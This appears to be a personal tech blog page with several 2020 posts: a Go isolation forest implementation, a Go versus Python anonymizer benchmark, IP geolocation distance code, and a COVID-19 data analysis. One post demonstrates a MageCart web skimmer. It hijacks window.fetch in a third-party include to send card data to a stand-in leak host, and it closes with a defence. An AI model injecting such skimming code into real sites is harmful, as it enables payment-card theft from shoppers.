Wednesday, October 28, 2020

Isolation Forest GO Implementation

isolation forest (image taken from the wikipedia site)

Lately I have implemented and checked an isolation tree algorithm to detect anomalies in the data. The implementation is available in github: https://github.com/alonana/isolationforest.

The isolation forest algorithm is presented in this article, and you can find examples and illustrations in this post.

There is even an old implementation in GO, but I found some issues about it (for example, it randoms a split attribute even it has only one value), so I do not recommend using it.

An example of usage is available as a unit test in the github itself.

package isolationforest

import (
   "fmt"
   "github.com/alonana/isolationforest/point"
   "github.com/alonana/isolationforest/points"
   "math/rand"
   "testing"
)

func Test(t *testing.T) {
   baseline := points.Create()

   for value := 0; value < 1000; value++ {
      x := float32(rand.NormFloat64())
      y := float32(rand.NormFloat64())
      baseline.Add(point.Create(x, y))
   }

   f := Create(100, baseline)

   for radix := 0; radix < 10; radix++ {
      fmt.Printf("radix %v score: %v\n", radix, f.Score(point.Create(float32(radix), float32(radix))))
   }
}

The test adds 1000 points with a normal distribution: the mean is zero, and the standard deviation is 1.

Then, it checks the score for points (0,0), and (1,1), and (2,2), and so on.

The output is:

radix 0 score: 0.4144628
radix 1 score: 0.45397913
radix 2 score: 0.6438788
radix 3 score: 0.7528539
radix 4 score: 0.7821442
radix 5 score: 0.7821442
radix 6 score: 0.7821442
radix 7 score: 0.7821442
radix 8 score: 0.7821442
radix 9 score: 0.7821442

So a point with ~1 standard deviation, gets a score < 0.5, as expected, while points more far from the mean, get score > 0.5.

In the tests I've performed, I've found the isolation forest algorithm functioning well for a normal distributed data, with many data records, but for discrete values, and for small amount of data, it did not performed well. The reason is that the path length to anomalies data was almost similar to non-anomalies data points, due to random selection of the segmentation values.

Wednesday, October 21, 2020

Anonymizer Performance Compare GoLang vs. Python

In this post we will create a sample application both in Go and and Python, and then we will compare the performance of the programming languages.

For the purpose of the comparison, we will create an anonymizer - an application that reads a JSON file, and replaces the private and confidential information with an anonymized text. The anonymizer is a good example for an application, it uses JSON parsing and regular expression, so it uses the core of the related language framework.

The GO Application

The GO application starts with reading a file, JSON parsing it, analyzing the JSON, and printing the modified anonymized JSON result.

func main() {
   bytes, err := ioutil.ReadFile("in.json")
   if err != nil {
      panic(err)
   }
   
   var document map[string]interface{}
   err = json.Unmarshal(bytes, &document)
   if err != nil {
      panic(err)
   }

   recurseMap(document, "")

   data, err := json.Marshal(document)
   if err != nil {
      panic(err)
   }

   fmt.Print(string(data))
}

To analyze the JSON, we recursively scan all its elements, and if a specific element should be annonymized, we replace the value with the text "PRIVATE"

func recurseMap(element map[string]interface{}, path string) {
   for key, value := range element {
      newValue := recurseObject(value, path+"/"+key)
      if newValue != nil {
         element[key] = newValue
      }
   }
}

func recurseArray(array []interface{}, path string) {
   for i, value := range array {
      newValue := recurseObject(value, fmt.Sprintf("%v[%v]", path, i))
      if newValue != nil {
         array[i] = newValue
      }
   }
}

func recurseObject(value interface{}, path string) interface{} {
   childMap, ok := value.(map[string]interface{})
   if ok {
      recurseMap(childMap, path)
      return nil
   }

   childArray, ok := value.([]interface{})
   if ok {
      recurseArray(childArray, path)
      return nil
   }

   if isConfidential(value) {
      return "PRIVATE"
   }

   return nil
}

Finally, the actual anonymizer uses regular expressions to locate text that should be anonymized. In this example, we hide IP address, credit card, and location address.

var creditRegex = regexp.MustCompile(`^(?:4[0-9]{12}(?:[0-9]{3})?|[25][1-7][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\d{3})\d{11})$`)
var addressRegex = regexp.MustCompile(`^\d+\s[A-z]+\s[A-z]+`)
var ipRegex = regexp.MustCompile(`^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$`)

func isConfidential(value interface{}) bool {
   valueString, ok := value.(string)
   if !ok {
      return false
   }

   if creditRegex.MatchString(valueString) {
      return true
   }

   if addressRegex.MatchString(valueString) {
      return true
   }

   if ipRegex.MatchString(valueString) {
      return true
   }

   return false
}

The Python Application

The python application starts with reading a file, JSON parsing it, analyzing the JSON, and printing the modified anonymized JSON result.

with open('in.json', 'r') as f:
    data = f.read()
    document = json.loads(data)
    recurse_map(document, "")
    data = json.dumps(document)
    print(data)

To analyze the JSON, we recursively scan all its elements, and if a specific element should be annonymized, we replace the value with the text "PRIVATE"

def recurse_object(element, path):
    if type(element) is dict:
        recurse_map(element, path)
        return None

    if type(element) is list:
        recurse_list(element, path)
        return None

    if is_confidential(element):
        return "PRIVATE"

    return None


def recurse_list(list, path):
    for i, value in enumerate(list):
        new_value = recurse_object(value, "{}/[{}]".format(path, i))
        if new_value is not None:
            list[i] = new_value


def recurse_map(element, path):
    for key in element.keys():
        value = element[key]
        new_value = recurse_object(value, path + "/" + key)
        if new_value is not None:
            element[key] = new_value

Finally, the actual anonymizer uses regular expressions to locate text that should be anonymized. In this example, we hide IP address, credit card, and location address.

credit_regex = re.compile(
    '^(?:4[0-9]{12}(?:[0-9]{3})?|[25][1-7][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\\d{3})\\d{11})$')
address_regex = re.compile('^\\d+\\s[A-z]+\\s[A-z]+')
ip_regex = re.compile('^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$')


def is_confidential(value):
    if type(value) is not str:
        return False

    if credit_regex.match(value):
        return True
    if address_regex.match(value):
        return True
    if ip_regex.match(value):
        return True

    return False

The Performance Tests Results

To test the performance of the application, we use a 1 megabytes JSON file, and we run the JSON parse and the anonymize multiple times.

Go test code:

var data []byte
startTime := time.Now()
for i := 0; i < 500; i++ {

   var document map[string]interface{}
   err = json.Unmarshal(bytes, &document)
   if err != nil {
      panic(err)
   }

   recurseMap(document, "")

   data, err = json.Marshal(document)
   if err != nil {
      panic(err)
   }

}

passed := time.Now().Sub(startTime)
fmt.Printf("%v\n", passed)
fmt.Print(string(data))

Python test code:

with open('in.json', 'r') as f:
    data = f.read()
    start_time = datetime.datetime.now()
    for i in range(500):
        document = json.loads(data)
        recurse_map(document, "")
        data = json.dumps(document)
    delta =  datetime.datetime.now() - start_time
    print(delta)

~~The python code is complete within ~32 seconds, and the Go code is complete within ~15 milliseconds.~~

Edit:

I've rerun the tests, and apparently I was using different files for GO and python :(

After using the same JSON input files, I've found the the results are almost identical.

MageCart Attack

In this post we will provide an example to illustrate the MageCart attacks.

The MageCart group had deployed a malicious javascript code in a e-commerce website, that had copied confidential customer information, into MageCart group server.

The deployment was done in a clever way. The e-commerce site has many 3rd-parties tools that it uses, and some of these are included directly from the 3rd-party site. The MageCart group had attacked one of the 3rd-parties, and injected their own javascript code into the 3rd-party code. By doing this, the MageCart javascript code was actually injected into the e-commerce website.

Let's check how is this done.

To simulate the e-commerce website, we will start from an empty site. We will build the site using a react app:

npx create-react-app demo
cd demo
npm start

Next we create a simple page with a /buy/card=ID to simulate an item purchase transaction. To do so, we replace the App.js with the following:

import React, {useState} from 'react';
import './App.css';

function App() {
    const [card, setCard] = useState('1111111');
    return (
        <div className="App">
            <div>
                Enter your credit card number:
            </div>
            <input
                type="text"
                value={card}
                onChange={e => setCard(e.target.value)}
            />
            <div
                onClick={() => buy()}
            >
                Buy Me!
            </div>
        </div>
    );

    function buy() {
        fetch(`/api/buy?card=${card}`).then(() => {
            alert("you've got it")
        })
    }

}

export default App;

Clicking on the "Buy Me!" triggers the /api/buy?card=CARD_ID API call.

Now let's add a stub to simulate a 3rd-party include:

import './3rdparty';
import React, {useState} from 'react';
import './App.css';

And leak out the CARD ID to another URL from the 3rdparty.js include:

const origFetch = window.fetch

window.fetch = async function (url, args) {
    origFetch.apply(this, [
        "www.leak.com", {
            method: 'POST',
            body: JSON.stringify({
                url,
                args,
            })
        }
    ])

    return origFetch.apply(this, [url, args])
}

Final Notes

In this post we have reviewed an example of the MageCart attack.

A possible protection from such an attack is to freeze the window.fetch function, as specified in this post. This requires your javascript code to be executed before the included 3rdparty.js, but is quite easy to achieve.

Tuesday, October 13, 2020

Finding Distance between Source IPs

In this post we will review to find distance between two source IPs. This can be used in case, for example, we know that a certain user, which was sending HTTP requests to our site from one IP, and now the requests arrive from a new IP, so we want to understand how far had the user traveled.

Given a source IP, we will use a Geo IP database to find the estimated location of the source IP. Then we will use a sphere distance function to calculate the points. Let's review the steps to perform this.

Download a Geo IP Database

There are several companies providing a Geo location database. A Geo location database provides a list of IPs subnets, and for each network subnet the following details can be included:

Country
City
Longitude
Latitude
ISP
ASN
Accuracy radius

We will use MaxMind's GeoIP location database. MaxMind provides the following GeoIP databases types:

GeoIP - a full and accurate database, with a max accuracy, and weekly updates. This database can be purchased at a price of ~100$ per month, and includes support from the MaxMind's team.
GeoLite2 - a light version of the GeoIP, which can be downloaded for free. It is less accurate, includes less frequent updates, and does not include support from MaxMind's team.

The good thing about this, is that both GeoIP and GeoLite2 are using the same format, so we can start with the GeoLite2 database, implement our code, and then, if we move to production, and need more accurate results, we can switch to the GeoIP database.

Notice that each database type include the Country version and the City version. The country version only provides the country name per network subnet, and is less relevant for us. We will use the City version.

Find the Location of a Source IP

Now that we have downloaded the GeoIP database, we can use the GO library maxminddb-golang to get details per a source IP. An example of such code is listed below.

package main

import (
   "fmt"
   "github.com/oschwald/maxminddb-golang"
   "math"
   "net"
)

type location struct {
   Latitude  float32 `maxminddb:"latitude"`
   Longitude float32 `maxminddb:"longitude"`
}

type record struct {
   Location location `maxminddb:"location"`
}

func main() {
   db, err := maxminddb.Open("/geoip.mmdb")
   if err != nil {
      panic(err)
   }

   ip := "8.8.8.8"
   netIp := net.ParseIP(ip)
   var r record
   err = db.Lookup(netIp, &r)
   if err != nil {
      panic(err)
   }

   fmt.Print(r)
}

Find the Distance between Two Locations

Now that we have the location for a source IP, specified by latitude and longitude, we can find the distance between the points. We will use a circle distance function. The distance implementation is below. It returns the distance in KiloMeters units.

func hsin(theta float64) float64 {
   return math.Pow(math.Sin(theta/2), 2)
}

func (l *location) distance(other *location) float64 {
   la1 := float64(l.Latitude) * math.Pi / 180
   lo1 := float64(l.Longitude) * math.Pi / 180
   la2 := float64(other.Latitude) * math.Pi / 180
   lo2 := float64(other.Longitude) * math.Pi / 180

   h := hsin(la2-la1) + math.Cos(la1)*math.Cos(la2)*hsin(lo2-lo1)

   r := 6371.0 // Earth radius in KM
   return 2 * r * math.Asin(math.Sqrt(h))
}

A nice representation of a distance function can be shown in Google Maps, finding the distance between the Google DNS server IP 8.8.8.8, and Tel-Aviv:

Wednesday, October 7, 2020

COVID-19 ISRAEL Data Analysis

In this post we will analyze the COVID-19 spread in ISRAEL.

For the data analysis we will use python. The data is fetched from the worldometer site using the python requests package. We will create graphs using the python matplotlib package.

The first thing we need to do it to fetch the data from the worldometer site. This is done by fetching data from the https://www.worldometers.info/coronavirus/country/israel/ URL, and using regular expression to extract the dates and the total cases values.

To avoid accessing the site whenever we run the application, we cache the site response into a file. If the file already exists, we use it instead of accessing the site. To reload the site data, we simply delete the cache file.

data_path = 'data.txt'
if not os.path.isfile(data_path):
    with open(data_path, 'w') as f:
        print("fetching data")
        r = requests.get("https://www.worldometers.info/coronavirus/country/israel/")
        f.write(r.text)

print("reading data from file")
with open(data_path, 'r') as f:
    data = f.read()

print("get only the total data")
position = data.find("Total Coronavirus Cases")
data = data[position:]

print("get dates from data")
categories = re.search("categories: \\[([^]]*)]", data)
categories_non_quoted = categories.group(1).replace("\"", "")
dates = categories_non_quoted.split(",")
print("loaded {} dates".format(len(dates)))

print("get values from data")
values = re.search("data: \\[([^]]*)]", data)
total = values.group(1).split(",")
total = [int(x) for x in total]
print("loaded {} values".format(len(total)))

Next, we create a function to save a graph using the matplotlib.

import os
import re

import matplotlib.pyplot as plt
import requests


def plot(title, x_dates, y_values):
    print("create {} graph".format(title))
    plt.clf()
    plt.title(title.title())

    fig, ax = plt.subplots()
    ax.set_xticks(range(0, len(x_dates), 10))
    plt.xticks(rotation=75)
    plt.plot(x_dates, y_values)

    plt.minorticks_on()
    plt.grid(axis='y', which='major')
    plt.grid(axis='y', which='minor', alpha=0.2)

    plt.ylim(0, max(y_values) * 1.05)

    plt.savefig(title.replace(" ", "_"), dpi=300)

And now we can plot the total cases in ISRAEL:

plot("total cases", dates, total)

To get the following graph:

While we might get a first impression from this graphs, the real information is in the delta - the new cases discovered every day. Let's create this data, and plot the graph.

print("new cases")
new_cases = []
prev = 0
for i in range(len(total)):
    new_cases.append(total[i] - prev)
    prev = total[i]
plot("new cases", dates, new_cases)

And the graph is:

We can see the new cases per day are fluctuating. A quick examination of the data, reveals that there is a a one week frequency in the fluctuation. This can be explained by the fact that the COVID-19 tests labs are less productive on the weekends.

Let's create a week average for the COVID-19 new cases:

print("new cases weekly average")
new_cases_weekly = []
week = [0] * 7
for i in range(len(new_cases)):
    week.pop(0)
    week.append(new_cases[i])
    new_cases_weekly.append(sum(week) / len(week))
plot("new cases weekly", dates, new_cases_weekly)

And now we get the graph:

That's much better!

We can now clearly see the first infection wave, starting at March, and the second wave starting at June. One last thing we should check is the R0 infection rate. We assume that every new infected person might infect others for a period of 10 days, and find out how many were infected.

print("R zero")
r_zero = []
infection_days = 10
days_range = len(new_cases_weekly) - infection_days
for i in range(days_range):
    current = new_cases_weekly[i]
    if current == 0:
        r_zero.append(0)
    else:
        r_zero.append(new_cases_weekly[i + infection_days] / current)
plot("r zero", dates[:days_range], r_zero)

and get the R0 graph:

And so, we can see that as of 10 days ago, the R0 factor is below 1, which indicates that the current wave had started its fading about 10 days ago.

Final Note

Since we assume a 10 days delay for R0 calculation, we can expect that regardless of the current steps that will be taken by ISRAEL government in the next 10 days, the second wave will continue its fading down.

Not just this. since the lockdown was harden 10 days ago, we expect the drop down in the new cases per days to drop even faster for at least 10 more days.

Would it be enough?

Do government officials really read and understand the data in the same manner that we have here?

We will have to wait and find out...

Full Blog TOC

Full Blog Table Of Content with Keywords Available HERE